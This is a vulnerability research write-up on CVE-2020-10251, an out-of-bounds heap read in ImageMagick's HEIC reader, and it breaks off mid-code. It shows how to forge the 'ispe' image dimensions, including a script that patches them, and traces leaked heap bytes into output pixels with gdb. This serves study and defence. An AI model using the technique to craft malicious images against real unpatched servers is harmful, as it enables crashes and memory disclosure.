ImageMagick Vulnerability Analysis

I previously did some research on the automated detection of vulnerabilities in binaries. I used a few known vulnerabilities as benchmarks for my detection algorithm, one of which was CVE-2020-25674. This CVE was a bug in ImageMagick, “a widely deployed, general purpose image processing library written in C, most commonly used to resize, transcode or annotate user supplied images on the web… Given its maturity, performance and permissive licencing, ImageMagick is commonly employed for backend image processing for most consumer related software that deal with images” (Ben Simmonds). This bug allowed for an out-of-bounds (OOB) read on the heap. On GitHub, there were many such closed issues with a proof-of-concept (POC) exploit image file and, sometimes, sanitiser logs. With work freeing up recently, I decided to explore some of these vulnerabilities and see how exploitable they were. In this post, we will focus our efforts on CVE-2020-10251, the most recent issue on the ImageMagick repository with the “Bug” label.

Reproducing the vulnerability

Before we start, here is the description of the vulnerability from the GitHub issue author: “An out-of-bounds read vulnerability exists within the “ReadHEICImageByID()” function (ImageMagick\coders\heic.c) which can be triggered via an image with width or height in pixel more than length or actual physical size of the image.” A POC heic format image file (password: girlelecta) was provided, along with the ImageMagick command that triggered the bug: “magick convert poc.heic new.png”. More on the heic image format later – let’s first make sure that we can even reproduce the vulnerability.

Here are the steps I took to set up my environment:

Set up a Docker container. I used an Ubuntu 20.04 image, mounted to a local folder, and installed gcc, gdb and gef.
Look for the vulnerable version of ImageMagick on GitHub. The latest version would already be patched. For this CVE, the latest vulnerable version is 7.0.9-27, i.e. the patch landed in version 7.0.10-0.
Install ImageMagick from source. As this vulnerability involves heic functionality, which ImageMagick does not support out of the box, additional steps have to be taken to enable heic support.
Optionally, you may want to save the container as an image. It may also be helpful to make sure gdb is able to disable ASLR inside the container.

Finally, start up and attach to your container. Running the command “magick convert poc.heic new.png” will trigger a core dump. To verify that the core dump is not just the result of a faulty installation, you can download a sample heic image from the internet and convert it instead. Analysing the core dump in gdb and looking at the backtrace, we can see that an abort signal was raised from within the “ReadHEICImageByID()” function, as reported. Running the trigger command inside gdb also produces a SIGSEGV from within “ReadHEICImageByID()”.

root@ead3cd493e68:/problem# magick convert poc.heic new.png
Aborted (core dumped)
    
root@ead3cd493e68:/problem# gdb magick core-dump
(gdb) bt
#0  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x00007f86f5ee0859 in __GI_abort () at abort.c:79
#2  0x00007f86f62495d2 in MagickSignalHandler (signal_number=0x6) at MagickCore/magick.c:1415
#3  0x00007f86f5f01090 in <signal handler called> () at /lib/x86_64-linux-gnu/libc.so.6
#4  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
#5  0x00007f86f5ee0859 in __GI_abort () at abort.c:79
#6  0x00007f86f62495d2 in MagickSignalHandler (signal_number=0xb) at MagickCore/magick.c:1415
#7  0x00007f86f5f01090 in <signal handler called> () at /lib/x86_64-linux-gnu/libc.so.6
#8  ReadHEICImageByID (image_info=image_info@entry=0x559f35f4e0e0, image=image@entry=0x559f35f577e0, heif_context=heif_context@entry=0x559f35f61ce0, image_id=<optimized out>, exception=exception@entry=0x559f35f43ed0) at ./MagickCore/pixel-accessor.h:856
...
    
(gdb) r convert poc.heic new.png
...
[#0] Id 1, Name: "magick", stopped 0x7ffff7e2e580 in ReadHEICImageByID (), reason: SIGSEGV

Understanding the vulnerability

Next, let’s try to understand the vulnerability from a high level by doing some source code analysis. The vulnerability lies in the ImageMagick “ReadHEICImageByID()” function, which is used to read a heic image file into memory. HEIC (High Efficiency Image Container) files are the standard image format for Apple devices. The trigger command “magick convert poc.heic new.png” converts an image of one file type (heic) to another file type (png). Intuitively, this would involve first reading the heic image file, then applying a conversion algorithm, and finally writing the output file to disk. Looking at the vulnerable version of the function on GitHub, we can gather a rough idea of what the function does based on the comments.

1. Set the image size. “heif_image_handle_get_width()” and “heif_image_handle_get_height()” are called.
2. Copy HEIF image into ImageMagick data structures. Importantly, “heif_decode_image()” is called here.
3. If there are any decoding options, correct the width and height of the image. “heif_image_get_width()” and “heif_image_get_height()” are called here.
4. Iterate over the pixels of the image and set their pixel colours accordingly.

Looking at the Git diff of the patch commit, we see that the patch changed step (3): the width and height of the image are now corrected regardless of whether there are any decoding options. This is also hinted at by the patch author’s comment on the GitHub issue. This means that the following code will now always run:

/*
    Correct the width and height of the image.
  */
  image->columns=(size_t) heif_image_get_width(heif_image,heif_channel_Y);
  image->rows=(size_t) heif_image_get_height(heif_image,heif_channel_Y);
  status=SetImageExtent(image,image->columns,image->rows,exception);
  if (status == MagickFalse)
    {
      heif_image_release(heif_image);
      heif_image_handle_release(image_handle);
      return(MagickFalse);
    }

Okay… but where do we go from here? Let’s backtrack from our SIGSEGV.


From GDB, we can see that the SIGSEGV occurs in the “SetPixelRed()” function. This is called as part of (4) of what “ReadHEICImageByID()” does, outlined above. Here is the relevant source code:

for (y=0; y < (ssize_t) image->rows; y++)
  {
    Quantum
      *q;

    register ssize_t
      x;

    q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
    if (q == (Quantum *) NULL)
      break;
    for (x=0; x < (ssize_t) image->columns; x++)
    {
      SetPixelRed(image,ScaleCharToQuantum((unsigned char) p_y[y*
        stride_y+x]),q);
      SetPixelGreen(image,ScaleCharToQuantum((unsigned char) p_cb[(y/2)*
        stride_cb+x/2]),q);
      SetPixelBlue(image,ScaleCharToQuantum((unsigned char) p_cr[(y/2)*
        stride_cr+x/2]),q);
      q+=GetPixelChannels(image);
    }
    if (SyncAuthenticPixels(image,exception) == MagickFalse)
      break;
  }

Looking at the for loops and the “p_y”, “p_cb”, “p_cr” arrays being accessed, we can guess that the SIGSEGV is due to an OOB array access (whether it is a read or a write is irrelevant for now) in this segment. Let’s trace back further to see how the bounds of the loops are set. We see that the loops’ bounds are “image->rows” and “image->columns”, which were part of the patch above, specifically L353-354:

  image->columns=(size_t) heif_image_get_width(heif_image,heif_channel_Y);
  image->rows=(size_t) heif_image_get_height(heif_image,heif_channel_Y);

According to the comments, this is where the image width and height are corrected. Prior to the patch, the width and height were sometimes left uncorrected, leading to the bug. In other words, the bug is fixed by always correcting the width and height. Prior to the patch, the correction was skipped whenever no decoding options were set, because of the check at L348:

if (decode_options != (struct heif_decoding_options *) NULL)

Looking earlier in the function, we see that “decode_options” is defined as a null pointer in L332, and is only later set in L337 if the “heic:preserve-orientation” option is set. This is a command line option which we did not pass in with our trigger command, so the correction did not happen. This matches our expectation that since our trigger command triggered the bug, the width and height must not have been corrected.

All this implies that the image width and height were initially set somewhere else, and that their initial values were inaccurate (hence needing to be corrected). We continue by trying to answer these two questions: where are the image width and height set, and how were they inaccurate? Reading through the source code, we find that the width and height are initially set in (1) of the function outline, L309-310. Here “image->rows” and “image->columns” are both set.

  image->columns=(size_t) heif_image_handle_get_width(image_handle);
  image->rows=(size_t) heif_image_handle_get_height(image_handle);

Let’s summarize what we know so far. “image->columns” and “image->rows” are first set with “heif_image_handle_get_width()” and “heif_image_handle_get_height()”. Then, some operation happens in the middle, after which “image->columns” and “image->rows” need to be corrected. If they are not corrected, then an OOB array access happens, where “image->columns” and “image->rows” are used as the loop bounds. Let’s crack one more bit of the puzzle before we move on to producing a minimal test case. What happens in the middle?

Looking at the source code again, we see that the interesting behaviour is likely triggered by the “heif_decode_image()” call which happens in (2). This is hinted at by the patch author’s comment in the Github issue: “It seems that we always need to call heif_image_get_width and heif_image_get_height after the image has been decoded”. Let’s try reproducing this on our own.

Producing a minimal test case

With a minimal test case, we retain the buggy behaviour of the ImageMagick binary while remaining lightweight. This makes testing possible POC files easier. There are three main things we want our test case to do:

1. Call “heif_image_handle_get_width()” and “heif_image_handle_get_height()”
2. Call “heif_decode_image()”
3. Call “heif_image_get_width()” and “heif_image_get_height()”

This will allow us to see what the initial wrong value is in (1) and what the corrected value is in (3). We can adapt an example from the libheif documentation to fit our needs. libheif is the external C library behind much of ImageMagick’s heif capabilities. Note that the options ImageMagick uses for decoding are different from those in the example. Here is the test case I came up with:

#include <libheif/heif.h>
#include <stdio.h>

int main()
{
    int w, h;
    const char input_filename[] = "poc.heic";
    struct heif_context *ctx = heif_context_alloc();
    heif_context_read_from_file(ctx, input_filename, 0);

    // get a handle to the primary image
    struct heif_image_handle *handle;
    heif_context_get_primary_image_handle(ctx, &handle);

    w = heif_image_handle_get_width(handle);
    h = heif_image_handle_get_height(handle);
    printf("Width: %d\nHeight: %d\n", w, h);

    // decode the image into YCbCr planes with 4:2:0 chroma subsampling
    struct heif_image *img;
    heif_decode_image(handle, &img, heif_colorspace_YCbCr, heif_chroma_420, 0);

    w = heif_image_get_width(img, heif_channel_Y);
    h = heif_image_get_height(img, heif_channel_Y);
    printf("Width: %d\nHeight: %d\n", w, h);
}

Compile and run in the Docker container:

root@ead3cd493e68:/problem# gcc minimal_test_case.c -lheif -o minimal_test_case
root@ead3cd493e68:/problem# ./minimal_test_case 
Width: 1280
Height: 4439
Width: 1280
Height: 854

Voila! We have managed to identify a discrepancy between the values in (1) and (3).

Let’s put what we’ve found so far in context of the vulnerability.

Initially, “heif_image_handle_get_height()” sets “image->rows” to 4439.
The image is then decoded with “heif_decode_image()”. According to libheif documentation, the function does: “Decode an heif_image_handle into the actual pixel image and also carry out all geometric transformations specified in the HEIF file (rotation, cropping, mirroring).”
Next, because the “heic:preserve-orientation” command line option is not set, “image->rows” is not corrected to its correct value of 854.
Finally, an array of pixels is retrieved from the decoded heic image with “heif_image_get_plane_readonly()”. This array is then accessed OOB, as the loop bound is still set to 4439, and not 854.

To clarify, since the array of pixels corresponds to the actual pixel data, if there were only X number of pixels, but we tried to access Y number of pixels, we can expect an OOB access (when Y > X).
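
To put a number on this, here is a small back-of-the-envelope sketch of how far past the Y plane the loop would read for the PoC dimensions. It assumes that the stride of the Y plane equals the real width of 1280 bytes, which has not been confirmed for this image (libheif may pad rows), and the helper name `overread_bytes` is made up for illustration.

```python
def overread_bytes(stride: int, real_rows: int, forged_rows: int, columns: int) -> int:
    """Number of bytes between the end of the real plane and the last offset read."""
    plane_bytes = stride * real_rows                      # bytes that really hold pixel data
    last_offset = (forged_rows - 1) * stride + (columns - 1)
    return max(0, last_offset + 1 - plane_bytes)


# Dimensions printed by the minimal test case; stride == width is an assumption.
STRIDE = 1280
print(STRIDE * 854)                            # size of the real Y plane: 1093120
print(overread_bytes(STRIDE, 854, 4439, 1280))  # bytes read past it: 4588800
```

Under that assumption, the loop would try to walk more than 4 MB past a plane of roughly 1 MB, which fits with the crash we saw.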

Narrowing down

With a better understanding of the vulnerability, let’s try to pinpoint what exactly triggers the vulnerability. Recall that the decode function also carries out transformations specified in the heic file, including cropping. The most intuitive idea I had was that there was a cropping transformation that caused the image’s height to shrink after it was decoded. To test my hypothesis, I enabled the option to ignore transformations in the decoding process, to see if the height still shrunk.

    struct heif_decoding_options *decode_options = heif_decoding_options_alloc();
    decode_options->ignore_transformations = 1;

    struct heif_image *img;
    heif_decode_image(handle, &img, heif_colorspace_YCbCr, heif_chroma_420, decode_options);

Surprisingly, it still shrunk, meaning that it was not a transformation that was causing the height to shrink. This quick test was useful, as it took far less time than understanding the libheif decoding and transformation code from scratch would have.

Triggering the vulnerability

Next, I hypothesized that a malicious modification of the image file could cause the initial “heif_image_handle_get_width()” and “heif_image_handle_get_height()” calls to return the wrong values. Since these functions are called before the image is decoded, libheif does not yet have access to the decoded pixel data of the image. This means that it must be getting its height and width from somewhere else, likely from some image metadata. This gives us the idea of metadata corruption.

Looking at the technical specification for the heif format, under Table VII, we see that heif allows the storage of image properties. Interestingly for us, there is an “Image spatial Extents (‘ispe’)” property which “indicates the width and height of the associated image item”. Maybe this is where ImageMagick gets the image dimensions from, prior to decoding. Let’s continue by finding where the ispe is located within the heic file. The following documentation is quite helpful:

* ftyp (major='heix')
* meta
    * hdlr (handler = 'pict')
    * uuid: b'85c0b687820f11e08111f4ce462b6a48'
        * CNCV: **b'CanonHEIF001/10.00.00/00.00.00'**
    * pitm (primary item)
    * iinf (item info box)
        * infe (info entry)
        * infe
        * ...
    * iref (item references box)
        * dimg (derived image)
        * thmb (thumbnail)
        * thmb
        * cdsc (content description)
        * cdsc
    * iprp (item properties box)
        * ipco (item properties container)
            * hvcC (HEVC configuration)
            * ispe (Image spatial extents = width and height )
            * colr (colour information)
            * pixi (pixel information)
            * irot (image rotation)
            * hvcC
            * ...

We see that under the “meta” tag lies our “iprp”, which contains an “ipco” with the “ispe”. Opening up “poc.heic” in a hex editor, we see these familiar strings.

At offset 0x1f5, we see “ispe”, and the width and height in hex (05 00, 11 57) shortly after. Manually changing the width to 1281 (05 01) and running our test case again:

root@ead3cd493e68:/problem# ./minimal_test_case 
Width: 1281
Height: 4439
Width: 1280
Height: 854

We have successfully controlled the value of “heif_image_handle_get_width()”. To confirm that we can trigger the vulnerability, let’s try turning a benign heic file into an exploit file. Using the following sample, let’s first check that ImageMagick can convert it successfully.

root@ead3cd493e68:/problem# magick convert sample.heic out.png
root@ead3cd493e68:/problem#

Next, let’s manually increase the width via editing ispe. This time, the width is located at offset 0x17b. Let’s change it from 960 (03 c0) to 5056 (13 c0).

root@ead3cd493e68:/problem# magick convert sample_vuln.heic out.png
Aborted (core dumped)
root@ead3cd493e68:/problem#

We have successfully triggered the vulnerability!
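
The manual hex edits above can also be scripted. The following is a minimal sketch, not a robust parser: it naively searches for the first “ispe” string and assumes the box layout of a 4-byte type, 4 bytes of version and flags, then big-endian 32-bit width and height. A real file may contain several ispe boxes (for thumbnails, for instance), in which case the first match may not be the one you want. The helper names and the 960x540 demo dimensions are made up for illustration.

```python
import struct


def find_ispe(data: bytes) -> int:
    """Offset of the first 'ispe' type field (naive search, assumption: first hit is ours)."""
    pos = data.find(b"ispe")
    if pos < 0:
        raise ValueError("no 'ispe' box found")
    return pos


def read_ispe(data: bytes) -> tuple:
    """Return (width, height) stored in the first ispe box."""
    # Skip the 4-byte type and the 4-byte version/flags field.
    return struct.unpack_from(">II", data, find_ispe(data) + 8)


def patch_ispe(data: bytes, width=None, height=None) -> bytes:
    """Return a copy of data with the ispe width and/or height overwritten."""
    pos = find_ispe(data)
    old_w, old_h = struct.unpack_from(">II", data, pos + 8)
    patched = bytearray(data)
    struct.pack_into(">II", patched, pos + 8,
                     old_w if width is None else width,
                     old_h if height is None else height)
    return bytes(patched)


# Synthetic ispe box for demonstration: size, type, version/flags, width, height.
box = struct.pack(">I4sIII", 20, b"ispe", 0, 960, 540)
forged = patch_ispe(box, width=5056)
print(read_ispe(box), read_ispe(forged))  # (960, 540) (5056, 540)

# Hypothetical usage on a real file:
# data = open("sample.heic", "rb").read()
# open("sample_vuln.heic", "wb").write(patch_ispe(data, width=5056))
```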

Static analysis: OOB access

Now, let’s try to control the vulnerability to do something useful. First, let’s figure out what the vulnerability allows us to do. Recall that the vulnerability lies in an array OOB access:

p_y = heif_image_get_plane_readonly(heif_image, heif_channel_Y, &stride_y);
p_cb = heif_image_get_plane_readonly(heif_image, heif_channel_Cb, &stride_cb);
p_cr = heif_image_get_plane_readonly(heif_image, heif_channel_Cr, &stride_cr);
...
for (y=0; y < (ssize_t) image->rows; y++)
  {
    Quantum *q;
    register ssize_t x;
    q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
    if (q == (Quantum *) NULL)
      break;
    for (x=0; x < (ssize_t) image->columns; x++)
    {
      SetPixelRed(image,ScaleCharToQuantum((unsigned char) p_y[y*
        stride_y+x]),q);  // OOB access
      SetPixelGreen(image,ScaleCharToQuantum((unsigned char) p_cb[(y/2)*
        stride_cb+x/2]),q);  // OOB access
      SetPixelBlue(image,ScaleCharToQuantum((unsigned char) p_cr[(y/2)*
        stride_cr+x/2]),q);  // OOB access
      q+=GetPixelChannels(image);
    }
    if (SyncAuthenticPixels(image,exception) == MagickFalse)
      break;
  }

The “p_y”, “p_cb”, “p_cr” arrays correspond to the actual pixel data extracted from the image, namely the three channels from the heic image. ImageMagick reads the heic file using a YCbCr colorspace, which is different from the familiar RGB colorspace. Naturally, a conversion will have to take place later on if we convert the image into a file format that uses the RGB colorspace, like PNG (by default). Normally, ImageMagick will access the pixel arrays via an index that corresponds to an (x, y) coordinate. By forging the image dimensions in the ispe earlier, we can trick ImageMagick into accessing pixel data that is beyond the largest coordinate of the image. Since the pixel arrays are 1-dimensional arrays, a third parameter, the stride, is used to access data at an (x, y) coordinate. The stride is provided by the original “heif_image_get_plane_readonly()” call.
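
To make the stride indexing concrete, here is a toy simulation of the Y-plane read. Python will not let us read out of bounds, so the sketch models memory as one flat buffer: a tiny 4x2 plane followed by four bytes standing in for whatever happens to sit after it on the heap. All names and sizes here are invented for the illustration.

```python
def read_rows(memory: bytes, stride: int, columns: int, rows: int) -> list:
    """Mirror the nested loop: one byte per (x, y), taken from offset y * stride + x."""
    out = []
    for y in range(rows):
        out.append(bytes(memory[y * stride + x] for x in range(columns)))
    return out


REAL_W, REAL_H = 4, 2
y_plane = bytes(range(1, REAL_W * REAL_H + 1))  # 8 real luma samples
memory = y_plane + b"HEAP"                      # stand-in for adjacent heap data

honest = read_rows(memory, stride=REAL_W, columns=REAL_W, rows=REAL_H)
forged = read_rows(memory, stride=REAL_W, columns=REAL_W, rows=REAL_H + 1)

print(honest)      # only the two real rows
print(forged[-1])  # b'HEAP': the extra row comes from beyond the plane
```

With the real dimensions, every offset stays inside the plane. With one extra forged row, the same index formula lands in the neighbouring bytes.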

Next, let’s figure out where the pixel arrays reside in memory through dynamic analysis. We want to place a breakpoint at the “heif_image_get_plane_readonly()” call to check its return value, which would be the memory address of the pixel arrays. From the backtrace, notice that the “ReadHEICImageByID()” function is an external symbol from “libMagickCore-7.Q16HDRI.so.6”. For easier debugging, we can extract the library from our Docker container (locate it using “vmmap” in GDB, and then use “docker cp” to retrieve it). With Ghidra, it is easy to find the address at which the “heif_image_get_plane_readonly()” call takes place.

Because ReadHEICImageByID is an external symbol, GDB will be unable to resolve it when running the binary from scratch. Instead, we need to break at main, then enable the desired breakpoints. After the “heif_image_get_plane_readonly()” call, we can see that the return value (stored in rax) is located within the heap.

In fact, the three arrays are located on the heap with “p_cr” at the lowest address, “p_cb” in the middle, and “p_y” near the end of the heap. This explains why a SIGSEGV is triggered, as accessing “p_y” OOB would access unmapped memory beyond the heap.

Finally, let’s determine if the OOB access is a read or a write by reading the source code. The code that triggers the OOB access is this:

SetPixelRed(image,ScaleCharToQuantum((unsigned char) p_y[y*stride_y+x]),q);

ScaleCharToQuantum has various definitions, depending on the value of “MAGICKCORE_QUANTUM_DEPTH”. This was set as a compilation flag, which we can access via Magick++-config.

$ Magick++-config --cxxflags
-fopenmp -DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16 -fopenmp -DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16 -fopenmp -DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16 -I/usr/local/include/ImageMagick-7

In my default installation of ImageMagick, we see that MAGICKCORE_QUANTUM_DEPTH is set to 16. The corresponding definition of ScaleCharToQuantum is as follows:

#elif (MAGICKCORE_QUANTUM_DEPTH == 16)
static inline Quantum ScaleCharToQuantum(const unsigned char value)
{
#if !defined(MAGICKCORE_HDRI_SUPPORT)
  return((Quantum) (257U*value));
#else
  return((Quantum) (257.0*value));
#endif
}

So, this reads the pixel value at a given coordinate and returns 257 times the original value. Next, “SetPixelRed()” is an inlined function that does the following:

static inline void SetPixelRed(const Image *magick_restrict image,
  const Quantum red,Quantum *magick_restrict pixel)
{
  pixel[image->channel_map[RedPixelChannel].offset]=red;
}

Putting this together, the OOB access does an OOB read on a heap pixel array and sets the red channel of the quantum “q” to 257 times that value. This means that we can use the vulnerability to leak heap data. However, this is not a straightforward leak. As I previously alluded to, this raw pixel data is in the YCbCr format, which will be encoded into RGB and then possibly compressed before being saved to the output image. In order to recover the original heap data, we still need to figure out how it is transformed into the output image.
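
As a rough model of what these two functions do together, the sketch below scales each byte by 257 and stores it in the red slot of a flat pixel buffer, advancing by the number of channels each time. The channel count of 3 and the red offset of 0 are placeholder values chosen for the illustration, not values read from ImageMagick’s channel map.

```python
def scale_char_to_quantum(value: int) -> float:
    """Q16 scaling from the definition above: 257 * value (255 maps to 65535)."""
    return 257.0 * value


def store_red(samples: bytes, channels: int = 3, red_offset: int = 0) -> list:
    """Write each scaled sample into the red slot of consecutive pixels."""
    pixels = [0.0] * (len(samples) * channels)
    q = 0                                   # plays the role of the moving pointer q
    for sample in samples:
        pixels[q + red_offset] = scale_char_to_quantum(sample)
        q += channels                       # q += GetPixelChannels(image)
    return pixels


print(store_red(b"\x41\x42"))  # [16705.0, 0.0, 0.0, 16962.0, 0.0, 0.0]
```

Since the scaling is a plain multiplication, dividing by 257 recovers the byte, as long as nothing else transforms the value in between.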

Dynamic analysis: heap to image

Static analysis isn’t very useful in determining where our leaked heap data goes, and consequently how it is transformed. There are tons of functions called by the ImageMagick binary, and following the flow of execution after “ReadHEICImageByID()” would be very tedious, if not outright infeasible. Instead, we will turn to dynamic analysis to understand the path our leaked heap data takes from the initial leak to its final destination, the output image. For simplicity, we will use a smaller heic image instead of the original poc. I used ImageMagick to resize the previous sample file to a size of 64x64.

$ magick convert sample.heic -resize 64x64\! 64x64.heic

Repeat the previous process of forging the ispe to obtain a vulnerable image of width 64, and height 65. Why do we modify the height, but leave the width intact? Let’s backtrack to the OOB read.

for (y=0; y < (ssize_t) image->rows; y++)
  {
    Quantum *q;
    register ssize_t x;
    q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
    if (q == (Quantum *) NULL)
      break;
    for (x=0; x < (ssize_t) image->columns; x++)
    {
      SetPixelRed(image,ScaleCharToQuantum((unsigned char) p_y[y*stride_y+x]),q);
      ...

Notice that y takes values from 0 to image->rows - 1 (ispe height) and x takes values from 0 to image->columns - 1 (ispe width). From experimentation in GDB, we can find that stride_y equals the real image width. By increasing the ispe height, we increase the number of values y takes on, while keeping the set of values of x the same. As a result, we sequentially read every byte (char) in p_y and then continue straight into the bytes that follow it, which is cleaner than the alternative of changing the width. Note that using a smaller image and a smaller OOB read will also help avoid a SIGSEGV, allowing us to trace the data flow until the program finishes.
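
A quick way to convince ourselves is to enumerate the offsets the loop would touch in both cases. This sketch assumes, as observed in GDB, that the stride equals the real width of 64. The function name is made up.

```python
def read_offsets(stride: int, columns: int, rows: int) -> list:
    """Offsets into the Y plane touched by the nested loop, in order."""
    return [y * stride + x for y in range(rows) for x in range(columns)]


STRIDE = 64
PLANE_SIZE = STRIDE * 64  # 64 real rows of 64 bytes

taller = read_offsets(STRIDE, columns=64, rows=65)  # forge the height
wider = read_offsets(STRIDE, columns=65, rows=64)   # forge the width

oob_taller = [o for o in taller if o >= PLANE_SIZE]
oob_wider = [o for o in wider if o >= PLANE_SIZE]

print(len(oob_taller), oob_taller[0], oob_taller[-1])  # 64 4096 4159
print(oob_wider)                                       # [4096]
print(len(wider) - len(set(wider)))                    # 63 offsets are read twice
```

Forging the height gives one clean pass over the plane followed by the next 64 bytes. Forging the width makes each row spill one byte into the next row, so most of the extra reads land on in-bounds bytes that are read twice, and only a single byte past the plane is touched.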

We will first try to spot patterns in how the heap data ends up in the output image. This is faster compared to rigorously analyzing the data flow. Let’s see what we get when we try to convert the vulnerable image.

$ magick convert 64x64_vuln.heic out.png
$ exiftool out.png
...
Image Size                      : 64x65
...

We get an output image that retains the forged dimensions. Viewing the image, we can see that the last row of pixels is solid green, with some noise. We can view the exact RGB values of the PNG’s last row with a Python script.

from PIL import Image
im = Image.open('out.png')
pixels = list(im.getdata())
width, height = im.size
pixels = [pixels[i * width:(i + 1) * width] for i in range(height)]
print(pixels[-1])

The majority value of RGB(0, 135, 0) corresponds to the green colour we were seeing. The pixels contributing to the noise can also be seen. We can find out the heap data represented by the pixels through GDB. Like before, let’s break after the first “heif_image_get_plane_readonly()” call so that we can get the stride and the heap address of the pixels. Recall that a pointer to “stride_y” is passed as the third argument to the function call, so we can read its value by dereferencing the rdx register. The heap address is the function return value, stored in rax. We can read the actual pixel data in the array by indexing it accordingly (stride_y * y + x). Rows 0 to 63 contain the 64 rows of real data. As expected, (OOB) reading the array at row index 64 gives no pixel data. In fact, the heap at this location contains only null bytes and some heap metadata. This corresponds to our previous observation: mainly RGB(0, 135, 0) (null bytes) and some noise (heap metadata). We can follow a similar method to find that the OOB reads of the other two pixel arrays also return mainly null bytes.

(gdb) b *(ReadHEICImageByID+439)
Breakpoint 2 at 0x7ffff7e2e477: file coders/heic.c, line 364.
(gdb) r convert 64x64_vuln.heic out.png
Starting program: /usr/local/bin/magick convert 64x64_vuln.heic out.png
...
(gdb) x/x $rdx
0x7fffffff4694: 0x0000000000000040
(gdb) info reg rax
rax            0x5555555abc60      0x5555555abc60
(gdb) x/8gx $rax
0x5555555abc60: 0x3d3733353d333138      0x35292a31302a253d
0x5555555abc70: 0x4a4c4b533a332a3e      0x3d332f4c51575549
0x5555555abc80: 0x4445433a3f434b4b      0x6b41314554323243
0x5555555abc90: 0x414a4e535055616d      0x1726271e221f2f3a
(gdb) x/8gx $rax+0x40*63
0x5555555acc20: 0x1b150c120c1d1c14      0x20160f15110d1015
0x5555555acc30: 0x27292c1f231e2329      0x303338302a2c3026
0x5555555acc40: 0x2d2b292b3428262d      0x1e1c31222a3c311d
0x5555555acc50: 0x2428292533292838      0x201b29211d192129
(gdb) x/8gx $rax+0x40*64
0x5555555acc60: 0x0000000000000000      0x0000000000000000
0x5555555acc70: 0x0000000000001020      0x0000000000001021
0x5555555acc80: 0x00005555555ae3d0      0x00005555555a3460
0x5555555acc90: 0x0000000000000000      0x0000000000000000

Next, let’s change some of the OOB read null bytes and see how the output PNG’s RGB values change.

(gdb) set {long}($rax+0x40*64) = 0x4847464544434241
(gdb) c
Continuing.
[Inferior 1 (process 487) exited normally]
$ py imreader.py
[(0, 200, 0), (0, 201, 0), (0, 202, 0), (0, 203, 0), (0, 204, 0), (0, 205, 0), (0, 206, 0), (0, 207, 0)...

We get a linear relationship! The pixel containing 0x41 is (0, 200, 0) and was originally (0, 135, 0), which is an increase of exactly 0x41. The same holds for each of the other 7 bytes. However, things aren’t so straightforward… If we replace the pixel data with 0x81, the resultant RGB value is (0, 255, 0), but we get the same RGB value if we use 0x91. So it seems like the linear relationship holds, but only up to a certain limit, beyond which we cannot recover the heap data. Strangely enough, if we use a larger value like 0xc1, the R value starts to change – we get (14, 255, 0). Even stranger, if we use an even larger value of 0xf1, the B value changes too – we get the RGB value of (62, 255, 15). This relationship is quite unusual when we consider it in light of a typical YCbCr to RGB conversion formula.

# a, b, c, d, e are constants
R = Y + e * Cr
G = Y - (a * e / b) * Cr - (c * d / b) * Cb
B = Y + d * Cb

Notably, R, G and B all scale linearly with Y, which is exactly what we were changing earlier. However, the relationship wasn’t so simple. Those more experienced in reverse engineering may already have some idea of what is going on, but let’s continue with dynamic analysis to clear things up. We also need to check the exact values of the constants ImageMagick uses for conversion.
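
As a sanity check on the observations so far, here is a small experiment of my own. It is a guess, not something taken from ImageMagick’s source: it assumes the common BT.601 full-range coefficients, chroma centred at 0.5 on a normalised 0 to 1 scale, and clamping of each output channel to the 0 to 255 range. It also assumes the OOB Cb and Cr bytes are zero, matching the null bytes we saw on the heap.

```python
def clamp01(value: float) -> float:
    return min(1.0, max(0.0, value))


def ycbcr_to_rgb(y: int, cb: int, cr: int) -> tuple:
    """Convert 8-bit YCbCr to 8-bit RGB (assumed BT.601 constants, clamped)."""
    yn, cbn, crn = y / 255.0, cb / 255.0 - 0.5, cr / 255.0 - 0.5
    r = yn + 1.402 * crn
    g = yn - 0.344136 * cbn - 0.714136 * crn
    b = yn + 1.772 * cbn
    return tuple(int(clamp01(c) * 255.0 + 0.5) for c in (r, g, b))


# The 64-bit value written in gdb is stored little-endian: bytes 0x41..0x48.
payload = (0x4847464544434241).to_bytes(8, "little")
print([ycbcr_to_rgb(b, 0, 0) for b in payload])  # (0, 200, 0) ... (0, 207, 0)

for y in (0x00, 0x81, 0x91, 0xC1, 0xF1):
    print(hex(y), ycbcr_to_rgb(y, 0, 0))
```

Under these assumptions the sketch gives (0, 135, 0) for a null byte, (0, 255, 0) for both 0x81 and 0x91, (14, 255, 0) for 0xc1 and (62, 255, 15) for 0xf1, which lines up with what we measured. That would suggest the relationship is linear in Y before clamping, with R and B pinned at 0 and G pinned at 255 over most of the range. We still need to confirm this against what ImageMagick actually does.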

Before we continue, some may have the idea of outputting to a heic file instead of a png, i.e. “magick convert 64x64_vuln.heic out.heic”. This would presumably skip any conversion process. Then, we could directly read the OOB heap data from the output image the same way it was originally read in the ImageMagick binary, via the libheif “heif_image_get_plane_readonly()” API. The “conversion” does work, producing an output heic image of size 64x65. Unfortunately, the YCbCr values read from the last row of the output heic image do not correspond exactly to the OOB heap data we control. For instance, writing 0x41 into the p_y array gives a Y value of 0x75. This is the code I used to read the output heic file:

// gcc read_heic.c -lheif -o read_heic && ./read_heic
#include <libheif/heif.h>
#include <stdio.h>

int main()
{
    const char input_filename[] = "out.heic";
    struct heif_context *ctx = heif_context_alloc();
    heif_context_read_from_file(ctx, input_filename, 0);

    struct heif_image_handle *handle;
    heif_context_get_primary_image_handle(ctx, &handle);

    struct heif_image *img;
    heif_decode_image(handle, &img, heif_colorspace_YCbCr, heif_chroma_420, 0);

    int stride_y, stride_cb, stride_cr;
    const uint8_t *p_y = heif_image_get_plane_readonly(img, heif_channel_Y, &stride_y);
    const uint8_t *p_cb = heif_image_get_plane_readonly(img, heif_channel_Cb, &stride_cb);
    const uint8_t *p_cr = heif_image_get_plane_readonly(img, heif_channel_Cr, &stride_cr);

    for (int i = 0; i < 8; i++)
    {
        uint8_t a = p_y[stride_y * 64 + i];
        uint8_t b = p_cb[stride_cb * 32 + i/2];
        uint8_t c = p_cr[stride_cr * 32 + i/2];
